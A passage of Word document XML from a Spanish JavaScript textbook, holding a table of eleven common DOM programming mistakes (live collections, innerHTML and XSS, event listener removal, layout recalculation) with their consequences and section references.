    <w:p w14:paraId="29E93272" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc239320019"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.14 — Los once errores frecuentes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="724102FF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos tienen algo en común: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>en el momento no parecen errores.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Por eso son frecuentes.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3008"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="36EFA110"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31CEAB2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El error</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7648475" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Por qué duele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63A5584" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Sección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="177DF4B5"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202C33F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Buscar un elemento antes de que exista</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F0918F5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Devuelve </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, y el error aparece después con un mensaje que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>no menciona el selector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B0F5D5F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>3.3 y 4.5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="5C44A15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6218C82" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Recorrer una colección viva mientras se la modifica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60183F60" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Se saltean elementos. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No falla: funciona a medias</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D443226" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="145E006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FEE4FA9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Usar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> con datos que no generó el propio código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0472E40F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Es la vulnerabilidad del capítulo y viola RN-F02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46A3C8DF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="458FB5B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542771C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Filtrar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y creer que alcanza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11E06B81" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> ni siquiera lo ejecuta; el vector real son los manejadores en línea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6988F0ED" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="2241789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53B5D30" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Leer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getAttribute("value")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> esperando el valor actual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4172D241" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Devuelve el valor inicial; falla sólo si el usuario tocó el campo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6CF8DCF4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="44CECF6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4BB63A9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Olvidar que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>dataset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> devuelve cadenas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63EB3670" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Un identificador numérico sin convertir falla la comparación </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>en silencio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5194640B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="7318B7A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CF7F20B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Registrar un manejador anónimo y pretender darlo de baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F0D7659" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Se exige la misma referencia: no da error y no da de baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="228212D2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.9.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="171E01D5"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649CEA5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Quitar el nodo sin dar de baja las suscripciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28894F1C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Produce la fuga del capítulo y viola RN-F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36AC9D5E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.9.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="734085A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5390452" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Usar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>stopPropagation()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> por precaución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2767A39E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Rompe la delegación de más arriba, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>incluso la futura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DFCB88B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.8.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="666D6C7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D548415" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Alternar escrituras y lecturas de geometría en un bucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E5BCB74" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Un recálculo por vuelta, y el hilo bloqueado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22991954" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="18AE7C7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EE770AC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Usar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerText</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> para leer texto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FDA1C9F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Depende del estilo y fuerza un recálculo; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es más barato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D88EB0F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
